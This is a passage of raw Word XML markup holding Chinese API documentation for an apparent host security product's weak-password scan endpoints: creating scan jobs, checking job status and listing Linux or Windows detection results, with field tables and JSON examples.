                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A95DB57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="420C85A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756F2FFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D948271" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="521ABBCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A3DA1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F2F27C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214D4D20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ACE4E2A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="355CFD45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B6D2033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34792017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D0EAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03A7365A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3799781A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15A144EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DE1CE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7206A2FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40DCD2F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72963760" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7626D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7AF82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F450C1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE47A4"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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F44A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38BD77"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67C94410"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3B03EDA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F44FEBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04ED8C34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28285DD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA3D3DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52F3ABA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20C0D8C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21489A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7958ABB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C0C287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690D141C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C96C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>调用前需要先调用4.3.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该风险扫描接口创建job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DE3E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462BF0E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5904F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc115166174"/>
      <w:bookmarkStart w:id="200" w:name="查询风险扫描执行状态-2"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r>
        <w:t>查询风险扫描执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="1C3DD7A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86066C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2FB102ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9FF96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445EEDE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D919D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC16164" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1FEB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71556D99"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="48D6572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55A6C7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2900AC16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19D69625" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584ACE39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E6ECEDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DAED21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C7E308" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5D6DCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6449CDF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次job执行状态，如果从未执行过job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C033AEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc115166175"/>
      <w:bookmarkStart w:id="202" w:name="查询风险检测结果-2"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询风险检测结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="22F83798" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27797D30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7AC47266" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65BCB2" w14:textId="25C2AB72" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "基本请求方法" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>基本请求方法</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304EC6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEF03CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02712F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B318647" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5b1edbed7d761b59ad1e7787",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "c7b5cd9f4bd927b7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.226",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.226",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "qt-System-Product-Name",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
